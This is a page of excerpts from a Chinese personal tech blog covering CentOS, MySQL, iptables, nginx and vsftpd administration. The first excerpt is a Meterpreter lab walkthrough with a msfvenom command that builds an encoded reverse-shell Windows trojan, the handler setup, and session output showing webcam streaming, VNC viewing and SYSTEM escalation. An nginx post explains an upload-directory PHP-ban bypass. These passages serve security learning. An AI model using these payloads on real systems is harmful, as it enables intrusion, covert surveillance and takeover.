首页
统计信息
友情链接
壁纸
Search
1
【更新】CommentToMail typecho2017&v4.1& Mailer三版本,支持php5.6/7,插件详解
158,186 阅读
2
【90APT开源免费】第三代哈弗H6、哈弗大狗、H6经典版、坦克300车机开启无线ADB、升级地图、安装软件全流程
18,168 阅读
3
CentOS 7安装bbr教程
12,924 阅读
4
纯小白10分钟变身linux建站高手?宝塔linux面板全体验
12,520 阅读
5
深信服超融合架构测试介绍
11,988 阅读
技术相关
ACG相关
胡言乱语
数码杂烩
登录
Search
标签搜索
进击的巨人
漫画
宝塔
php
typecho
diy
vps
折腾
动漫
优酷路由宝
ubuntu
路由器
QQ
KMS
王忘杰
累计撰写
287
篇文章
累计收到
179
条评论
首页
栏目
技术相关
ACG相关
胡言乱语
数码杂烩
页面
统计信息
友情链接
壁纸
搜索到
287
篇与
的结果
2021-03-17
Meterpreter(MSF)payload攻击载荷,反弹实验。
制作木马攻击载荷的概念类似反弹shell,使用msfvenom -v可以查看操作帮助msfvenom -l可以查看当前可以使用的攻击载荷列表生成一个反弹木马msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.136.131 lport=666 -f exe -e x86/shikata_ga_nai -i 8 -o muma2.exe -p windows/meterpreter/reverse_tcp使用反弹模式 lhost=192.168.136.131我的IP lport=666我要监听的端口 -f exe生成exe文件 -e x86/shikata_ga_nai编码混淆方式 -i 8编码混淆次数 -o muma.exe生成的文件 当然,简单的编码混淆是过不了杀毒软件的。本地监听进入监听模式msf > use exploit/multi/handler 监听的payload类型msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp 监听的IPmsf exploit(multi/handler) > set lhost 192.168.136.131 lhost => 192.168.136.131 监听的端口msf exploit(multi/handler) > set lport 666 lport => 444 开始监听msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.136.131:444 [*] Sending stage (179779 bytes) to 192.168.136.133 主机上线[*] Meterpreter session 1 opened (192.168.136.131:444 -> 192.168.136.133:1027) at 2018-05-05 20:10:43 +0800 VNC桌面实时监控meterpreter > run vnc Connected to RFB server, using protocol version 3.8 Enabling TightVNC protocol extensions No authentication needed Authentication successful Desktop name "www-a8d99aa2ea1" 查看在线的摄像头meterpreter > webcam_list 1: 实时监控摄像头meterpreter > webcam_stream [*] Starting... [*] Preparing player... [*] Opening player at: ebSRJuzI.html 查看系统信息meterpreter > sysinfo Computer : WWW-A8D99AA2EA1 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : zh_CN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows 查看当前权限meterpreter > getuid Server username: WWW-A8D99AA2EA1\Administrator 权限提升meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 完毕以上就是Meterpreter(MSF)payload攻击载荷的简单反弹实验,msf作为大型攻击框架,实际上可以攻击安卓、web系统、linux等等,帮助文档也比较详细,英文基础好上手毫无压力。
2021年03月17日
2,935 阅读
1 评论
0 点赞
2021-03-17
瑞友天翼应用虚拟化,企业远程办公,盗版软件规避的得力助手。
简介瑞友天翼应用虚拟化系统(GWT System)是国内具有自主知识产权的应用虚拟化平台,是基于服务器计算(Server-based Computing)的应用虚拟化平台。它将用户所有应用软件(ERP、OA、CRM、PDM、CAD……)集中部署在天翼服务器(群)上,客户端通过WEB即可快速安全的访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等,从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。操作终端无需再安装应用程序,通过天翼独特的RAP 协议(Remote Application Protocol),即可让用户快速访问服务器上的各类应用软件;天翼RAP 协议只传输鼠标、键盘及屏幕变化的矢量数据,访问仅需3KB/s(20kbps)的带宽,用户不再受客户端和连接性能要求的限制,在任何时间、任何地点,利用任何设备、任何网络连接方式,即可高效安全地访问服务器(群)上的应用程序和关键资源。企业痛点远程办公使用繁琐,比如仅使用金蝶,却需要VPN之类的远程连接手段。本地电脑配置不高,需要画图,又不想升级配置。购买了几套正版软件,但需要使用的人很多。都可以用应用虚拟化解决。下面我以浩辰CAD为例。下载http://soft.realor.cn/Gwt6.0.exe安装默认勾选即可默认即可设置密码设置web端口安装完成务必重启部署CAD,不再赘述。瑞友天翼主界面添加用户发布应用画图程序务必使用32位色彩,金蝶之类可以用16位速度更快。根据情况选择映射方式,推荐映射桌面和我的文档,局域网可以考虑不使用加密,速度更快。完成客户端使用登陆IP,首次使用需要安装客户端。不需要桌面图标和开机自启动再次登陆,注意允许瑞友天翼插件运行。运行CAD对于CAD来说,它相当于装在本地电脑上,路径映射正常。完毕
2021年03月17日
3,555 阅读
0 评论
0 点赞
2021-03-17
服务器运维之,centos忘记root密码怎么办,重置root密码,单用户模式
在grub选项菜单按e进入编辑模式编辑第二行,kernel那行 最后加上 1回车,按B引导进入进入后执行下列命令root@#passwd root (配置root的密码) Enter new unix password:输入新的密码 重启root@#init 6 完成
2021年03月17日
498 阅读
0 评论
0 点赞
2021-03-17
centos6 私有云owncloud8搭建,建立虚拟机主机,启用https,用户管理
什么叫私有云?我们都知道百度网盘,我们可以上传下载编辑分享。而私有云,就是私人的网盘私有云可以做什么?企业内,可以通过私有云同步数据,防止因为客户机宕机而造成数据丢失个人用户,私有云可以有效的在多平台同步隐私数据,例如家庭照片,录像等等
2021年03月17日
410 阅读
0 评论
0 点赞
2021-03-17
服务器安全之,隐藏端口,更改mysql端口,更改ssh端口
是不是应该挂个蜜罐,思前想后,我是拒绝的,因为黑客就算是在爆破,也会相应的耗费服务器资源,就让黑客忽略这台服务器吧!更改端口,我个人的原则,改到1W以上,例如22端口 10022 3306端口 13306 1W的端口用的很少,而且很少有黑客会扫描到1W以上的端口号查看当前mysql端口netstat -ntl 其实就能看出来开放了几个端口,mysql是3306如果以前改过,进入mysql查询 mysql -u root -p show global variables like 'port'; +---------------+-------+ | Variable_name | Value | +---------------+-------+ | port | 3306 | +---------------+-------+ 1 row in set (0.00 sec) 编辑/etc/my.cnf文件,添加一句port=3506 重启服务/etc/init.d/mysqld restart 查看netstat -ntl tcp 0 0 0.0.0.0:3506 0.0.0.0:* LISTEN 更改SSH端口/etc/ssh/sshd_config 添加一行Port 10022 重启服务/etc/init.d/sshd restart 然后netstat -nlt查看OK
2021年03月17日
448 阅读
0 评论
0 点赞
2021-03-17
apache加固策略,隐藏http头返回信息,隐藏错误信息,启用https,申请沃通免费SSL,关闭TRACE Method
当前apche版本Apache/2.2.15 系统centos6
2021年03月17日
247 阅读
0 评论
0 点赞
2021-03-17
centos6 LVM分区容量扩充
[root@cloud ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/vg_cloud-lv_root 7.4G 3.0G 4.1G 43% / 如果你买的VPS分区是10G+xxG=xxG这种,你肯定会遇到一个问题,根目录太小,空白磁盘不知道怎么利用
2021年03月17日
496 阅读
0 评论
0 点赞
2021-03-17
win2003+iis6+php+https跳转
买了个表,不仅vultr的单核768M比我快,这下连iis6都能装逼了。。目标配置iis6 配置php 添加https跳转
2021年03月17日
399 阅读
0 评论
0 点赞
2021-03-17
【笔记】mysql简单操作,建删表,建删用户,备份还原表
建议使用phpmyadmin或者Adminer操作,除非万不得已登陆mysql -u root -p 显示所有表show databases; 创建一个表CREATE DATABASE wordpress_db; 删除一个表drop database test; 列出所有用户SELECT DISTINCT CONCAT('User: ''',user,'''@''',host,''';') AS query FROM mysql.user; 删除一个用户delete from mysql.user where user='test' and host='localhost'; 创建一个用户,并给于用户一个表的所有权限GRANT ALL PRIVILEGES ON wordpress_db.* TO "user"@"localhost" IDENTIFIED BY "123456"; 保存FLUSH PRIVILEGES; 退出exit 备份与还原导出一个表mysqldump -uYONGHU -pMIMA -h127.0.0.1 -P3306 --routines --default-character-set=utf8 --databases BIAO > bak.sql 导入的操作其实一样的命令,注意最后的符号(> <)mysqldump -u用户名 -p密码 -h主机 数据库 < 路径mysqldump -uroot -p1234 BIAOdb < bak.sql
2021年03月17日
353 阅读
0 评论
0 点赞
2021-03-17
iptables的一些配置,附我的配置文件
控制单个I地址P的最大并发连接数iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 30 -j REJECT 限制连往本机的web服务,1个C段的IP的并发连接不超过100个,超过的被拒绝:iptables -I INPUT -p tcp --dport 80 -m iplimit --iplimit-above 100 --iplimit-mask 24 -j REJECT 限制连往本机的telnet单个IP并发连接为2个,超过的连接被拒绝:iptables -I INPUT -p tcp --dport 23 -m iplimit --iplimit-above 2 -j REJECT 防止同步包洪水(Sync Flood)iptables -A FORWARD -p tcp --syn -m limit --limit 1/s -j ACCEPT 防止各种端口扫描iptables -A FORWARD -p tcp --tcp-flags SYN,ACK,FIN,RST RST -m limit --limit 1/s -j ACCEPT Ping洪水攻击(Ping of Death)iptables -A FORWARD -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEP 屏蔽指定ipBLOCK_THIS_IP="x.x.x.x" iptables -A INPUT -i eth0 -p tcp -s "$BLOCK_THIS_IP" -j DROP 25个常用的iptables用法http://www.cnblogs.com/wangkangluo1/archive/2012/04/19/2457077.html我的配置文件覆盖,重启iptables即可/etc/sysconfig/iptables# Generated by iptables-save v1.4.7 on Thu Aug 20 10:40:51 2015 *filter :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [62:6399] -A INPUT -p tcp -m tcp --dport 80 -m connlimit --connlimit-above 20 --connlimit-mask 32 -j REJECT --reject-with icmp-port-unreachable -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT -A INPUT -p tcp -m tcp --dport 443 -j ACCEPT -A INPUT -p udp -m udp --dport 67 -j ACCEPT -A INPUT -p udp -m udp --dport 68 -j ACCEPT -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT -A INPUT -p icmp -j ACCEPT -A INPUT -i lo -j ACCEPT -A INPUT -p tcp -m state --state NEW -m tcp --dport 22 -j ACCEPT -A INPUT -j REJECT --reject-with icmp-host-prohibited -A INPUT -p udp -m udp --sport 53 -j ACCEPT -A INPUT -p udp -m udp --dport 53 -j ACCEPT -A FORWARD -j REJECT --reject-with icmp-host-prohibited -A FORWARD -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -m limit --limit 1/sec -j ACCEPT -A FORWARD -p icmp -m icmp --icmp-type 8 -m limit --limit 1/sec -j ACCEPT -A FORWARD -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK RST -m limit --limit 1/sec -j ACCEPT COMMIT # Completed on Thu Aug 20 10:40:51 2015
2021年03月17日
390 阅读
0 评论
0 点赞
2021-03-17
centos6快速部署vsftpd服务器
注意关闭selinux注意iptables放行2015-08-24更新我们都知道ftp是不安全,为什么我还要搭建呢?因为wordpress。。。他那个升级标志不升级是去不掉的不是主版本,而是翻译升级,我勒个擦。。安装vsftpdyum -y install vsftpd 启动service vsftpd restart 开启启动chkconfig vsftpd on 配置文件 /etc/vsftpd/vsftpd.conf 禁止匿名用户anonymous登录 anonymous_enable=NO 允许本地用户登录 local_enable=YES 开启chroot,防止越出目录 chroot_local_user=YES pasv模式 pasv_min_port=1 pasv_max_port=30999
2021年03月17日
303 阅读
0 评论
0 点赞
2021-03-17
nginx fastcgi/fpm 正则禁止上传目录php执行
注意,本文讨论的仅仅是如何绕过禁止规则进入cgi。nginx fastcgi/fpm 禁止上传目录php执行因为上传目录是具备写入权限的,写入权限很恐怖。1.最常见的,完全错误的方法来源,百度下最常见的location ~ ^/upload/.*\.(php|php5)$ { deny all; } 正则解释^/upload/.*.(php|php5)$开头匹配^ 中间任意匹配.* 点匹配\. (php|php5)php扩展名选择器 结尾匹配$绕过方法,1.php可以是个目录/1.php/3038714494.png2.Nginx下多站点正确限制目录php执行权限来源http://www.freebuf.com/articles/system/49428.htmllocation ~ /(ups)/.*\.(php|php5)?$ { deny all; } 正则解释比上面的多了一个?问号,问号代表零次或一次。绕过方式,同上/1.php/3038714494.png3.nginx+cgi解析php容易出现的漏洞来源 http://www.nginx.cn/316.htmllocation ~* ^/upload/.*.(php|php5)($|/) { deny all; } 正则解释^/upload/.*.(php|php5)($|/)开始匹配^ 匹配任意多字符.* 匹配任意字符请输入代码.(怀疑此处其实他想匹配点,但是正则中的点代表任意字符) 结束或者目录符号($|/)此方式解决了上面的绕过问题缺点,封杀太严格,目录中包含php三个字母就会封杀/php/3038714494.png4.关于lnmp目录禁止执行的绕过与正确方法来源地址 http://zone.wooyun.org/content/16213谷歌缓存 http://webcache.googleusercontent.com/search?q=cache:g3B4qj-SGXgJ:zone.wooyun.org/content/16213+&cd=1&hl=zh-CN&ct=clnk&gl=cnlocation ^~ /upload/ { default_type text/plain; expires 30d; } 解释,这不是正则,却更加有趣^~表示匹配一次,不再让其他location处理,从而不会匹配到cgi中这种方式需要的判断最少,是非常好的方式他只有一点点瑕疵,那就是源码泄漏如果config.php文件被复制到这个目录下,源码一览无余。因为这个方法只是不让php进入cgi,但是却没有禁止他的解析。5.我的方法当你看完上面的内容,相信你已经有了自己的方法了我这里稍微修改下第三种方法,就是括号里的部分location ~ (/usr/uploads/|/admin/).*\.(php|php5)($|/) { deny all; } 增加的部分 location ~ (/usr/uploads/|/admin/).*\.(php|php5)($|/)将从匹配任意字符调整为匹配点,这样就不会拦截包含php字符的目录了,但是依然会拦截如果出现.php目录,我们可以默认认为他是黑客行为。小提示,注意(/usr/uploads/|/admin/)和(/usr/uploads|/admin)的区别
2021年03月17日
363 阅读
0 评论
0 点赞
1
...
16
17
18
...
24